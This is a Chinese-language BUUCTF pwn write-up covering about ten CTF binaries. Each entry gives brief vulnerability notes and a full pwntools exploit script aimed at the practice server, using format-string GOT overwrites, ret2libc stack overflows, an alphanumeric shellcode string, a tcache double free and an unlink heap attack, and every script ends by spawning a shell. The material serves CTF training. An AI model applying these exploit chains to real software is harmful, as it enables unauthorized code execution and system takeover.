BUUCTF-pwn(11)
mrctf2020_easy_equation
简单的栈溢出漏洞,格式化字符串漏洞!此处采用栈溢出漏洞!
axb_2019_fmt64
经典循环格式化字符串64位漏洞!
唯一注意的地方pwntools的FmtStr_payload无法成功获取权限!需要手动计算字节进行攻击!
from elftools.construct.macros import Padding
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='amd64')
binary = './axb_2019_fmt64'
r = remote('node4.buuoj.cn',29901)
#r = process(binary)
elf = ELF(binary)
printf_got = elf.got['printf']
strlen_got = elf.got['strlen']
read_got = elf.got['read']
def leak(payload):
r.send(payload)
return r.recv()
r.recvuntil("Please tell me:")
#leak(b'aaaaaaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.'+p64(0)+b'cccccccc')
'''fmt = FmtStr(leak,numbwritten=9)
offset = fmt.offset'''
offset = 8
#gdb.attach(r)
r.send(b'aaaaaaaa.%11$sdd'+p64(0)+p64(read_got))
r.recvuntil(b"aaaaaaaa.")
read_addr = u64(r.recv(6).ljust(8,b'\x00'))
libc = LibcSearcher('read',read_addr)
libc_base = read_addr-libc.dump('read')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("read_addr -> "+hex(read_addr))
log.info("system -> "+hex(system))
#payload = fmtstr_payload(6,{strlen_got:system},numbwritten=9,write_size='byte')
high = (system & 0xff0000)//0x10000
low = (system & 0xffff)
print(high,low)
payload = '%'+str(high-9)+'c%12$hhn'+'%'+str(low-high)+'c%13$hn'
payload = bytes(payload,encoding='utf-8')+b'c'*(32-len(payload))+p64(strlen_got+2)+p64(strlen_got)
print(payload)
r.send(payload)
r.recvuntil("Please tell me:")
r.send(b';/bin/sh\x00')
r.interactive()
x_ctf_b0verfl0w
无保护的栈溢出漏洞!
from re import L
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='i386')
binary = './b0verfl0w'
r = remote('node4.buuoj.cn',29177)
#r = process(binary)
elf = ELF(binary)
main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
r.recvuntil("What's your name?\n")
payload = b'a'*0x24+p32(puts_plt)+p32(main)+p32(puts_got)
r.sendline(payload)
puts_addr = u32(r.recvuntil('\xf7')[-4:])
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("puts_addr -> "+hex(puts_addr))
log.info("libc_base -> "+hex(libc_base))
payload2 = b'a'*0x24+p32(system)+p32(main)+p32(sh)
r.sendline(payload2)
r.interactive()
suctf_2018_basic pwn
同样栈溢出漏洞!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './SUCTF_2018_basic_pwn'
r = remote('node4.buuoj.cn',27378)
#r = process(binary)
elf = ELF(binary)
binsh = 0x0401157
payload = b'a'*0x118+p64(binsh)
r.sendline(payload)
r.interactive()
mrctf2020_shellcode_revenge
此时ida无法对main函数进行反汇编到伪C代码,故采用cutter工具进行反汇编!
可以发现没有开启NX保护措施,但是却不存在栈溢出漏洞。
即开始排查是否存在除数字字母外字符。故查询资料,发现alpha3可以满足我们的条件!
git clone https://github.com/TaQini/alpha3.git
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './mrctf2020_shellcode_revenge'
r = remote('node4.buuoj.cn',25264)
#r = process(binary)
elf = ELF(binary)
'''r.recvuntil("Show me your magic!\n")
r.sendline(shellcode)'''
r.send("Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t")
r.interactive()
ciscn_2019_es_1
分析主要函数
Allocate申请函数!
Show打印函数
Free释放函数,存在UAF漏洞!
本题较为简单,libc为2.27,存在tcache,且有UAF漏洞,故可以double free,进而达到任意地址写。不过满保护保护,即无法写入got表,故可以写入malloc_hook,但经过实践发现malloc_hook存放one_gadget无法获取权限,从而思考realloc_hook的方法,但依然不行,故写入free_hook中!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './ciscn_2019_es_1'
r = remote('node4.buuoj.cn',26708)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.27.so')
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("choice:",'1')
r.sendlineafter("Please input the size of compary's name",str(size))
r.sendafter("please input name:",payload)
r.sendafter("please input compary call:",b'/bin/sh\x00')
def Show(index):
r.sendlineafter("choice:",'2')
r.sendlineafter("Please input the index:",str(index))
def Free(index):
r.sendlineafter("choice:",'3')
r.sendlineafter("Please input the index:",str(index))
Allocate(0x410)#0
Allocate(0x60)#1
Allocate()#2
Free(1)
Free(1)#double free
Free(0)
Show(0)
main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-96
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3EBC40
realloc = libc_base+libc.symbols['__libc_realloc']#+0x98C30
free = libc_base+libc.symbols['__free_hook']#+0x3ED8E8
one = [0x4f2c5,0x4f322,0x10a38c,0x4f2c5,0x4f322,0x10a38c]
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))
log.info("free_hook -> "+hex(free))
Allocate(0x60,p64(free))#3
Allocate(0x60,p64(free))#4
Allocate(0x60,p64(one[4]+libc_base))#5
#gdb.attach(r)
#r.sendlineafter("choice:",'1')
Free(2)
r.interactive()
picoctf_2018_leak_me
简单的泄露!
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './PicoCTF_2018_leak-me'
r = remote("node4.buuoj.cn",29362)
#r = process(binary)
elf = ELF(binary)
name = 'njh'#b'a'*0xf8+b'c'*0x8
r.sendlineafter("What is your name?",name)
#r.recvuntil(b"ccccccc,")
#passwd = r.recvline()[:-1]
#r.recvuntil("Please Enter the Password.\n")
sleep(0.1)
r.sendline(b'a_reAllY_s3cuRe_p4s$word_f85406')
r.interactive()
inndy_echo
简单的格式化字符串漏洞,且为32位!直接使用pwntools集成格式化自动工具即可!
from re import L
from pwn import *
context(log_level='debug',os='linux',arch='i386')
binary = './echo'
r = remote('node4.buuoj.cn',28025)
#r = process(binary)
elf = ELF(binary)
printf_got = elf.got['printf']
system = elf.symbols['system']
def leak(payload):
r.sendline(payload)
return r.recv()
fmt = FmtStr(leak)
offset = fmt.offset#7
log.warn("offset -> "+str(offset))
payload = fmtstr_payload(offset,{printf_got:system})
r.sendline(payload)
sleep(0.1)
r.sendline(b'/bin/sh\x00')
r.interactive()
hitcontraining_unlink
分析主要函数!
Allocate申请函数,读入内容时最后一位设置成了\x00,存在截断
Show打印函数,遇到\x00结束
Edit编辑函数,存在堆溢出漏洞!
Free释放函数,不存在UAF等漏洞!
本题较为简单,题目名为Unlink,故采取Unlink手法进行攻击(存在bss段全局变量),便可以得到任意地址写!本题采用覆写free_got表的方法进行,但需要注意free_got与puts_got响铃,截断会破坏puts_got,需注意不能破坏puts_got,否则无法获取权限!
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './bamboobox'
r = remote('node4.buuoj.cn',26559)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc.so')
free_got = elf.got['free']
malloc_got = elf.got['malloc']
bss_addr = 0x06020C8
def Allocate(size=0x18,payload='\n'):
r.sendlineafter("Your choice:",'2')
r.sendlineafter("Please enter the length of item name:",str(size))
r.sendafter("Please enter the name of item:",payload)
def Show():
r.sendlineafter("Your choice:",'1')
def Edit(index,payload):
r.sendlineafter("Your choice:",'3')
r.sendlineafter("Please enter the index of item:",str(index))
r.sendlineafter("Please enter the length of item name:",str(len(payload)))
r.sendafter("Please enter the new name of the item:",payload)
def Free(index):
r.sendlineafter("Your choice:",'4')
r.sendlineafter("Please enter the index of item:",str(index))
def Exit():
r.sendlineafter("Your choice:",'5')
Allocate(0x80)#0
Allocate()#1
Allocate(0x80)#2
Allocate()#3
Allocate(0x18,b'/bin/sh\x00')#4
target = bss_addr
fd = target-0x18
bk = target-0x10
Edit(0,p64(0)+p64(0xa1)+p64(fd)+p64(bk))
Edit(1,b'a'*0x10+p64(0xa0)+p64(0x90))
Free(2)#Unlink
Allocate(0x70)#2
Show()
r.recvuntil("1 : ")
main_arenea = u64(r.recv(6).ljust(8,b'\x00'))-88
libc_base = main_arenea-0x10-libc.symbols['__malloc_hook']#-0x3C3B20
system = libc_base+libc.symbols['system']#+0x45380
puts = libc_base+libc.symbols['puts']#+0x6F5D0
log.info("main_arena -> "+hex(main_arenea))
log.warn("libc_base -> "+hex(libc_base))
one = [0x45206,0x4525a,0xef9f4,0xf0897]
Edit(0,b'a'*0x18+p64(target)+b'a'*8+p64(free_got))
#gdb.attach(r)
Edit(1,p64(system)+p64(puts))
Free(4)
r.interactive()
axb_2019_brop64
简单64位栈溢出漏洞,ret2libc!
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='amd64')
binary = './axb_2019_brop64'
r = remote('node4.buuoj.cn',26284)
#r = process(binary)
elf = ELF(binary)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x0400963
start = 0x04006E0
r.recvuntil("Please tell me:")
payload = b'a'*0xd8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
r.sendline(payload)
puts_addr = u64(r.recvuntil('\n')[-7:-1].ljust(8,b'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.warn("puts_addr -> "+hex(puts_addr))
payload2 = b'a'*0xd8+p64(pop_rdi_ret)+p64(sh)+p64(system)+p64(start)
r.sendline(payload2)
r.interactive()
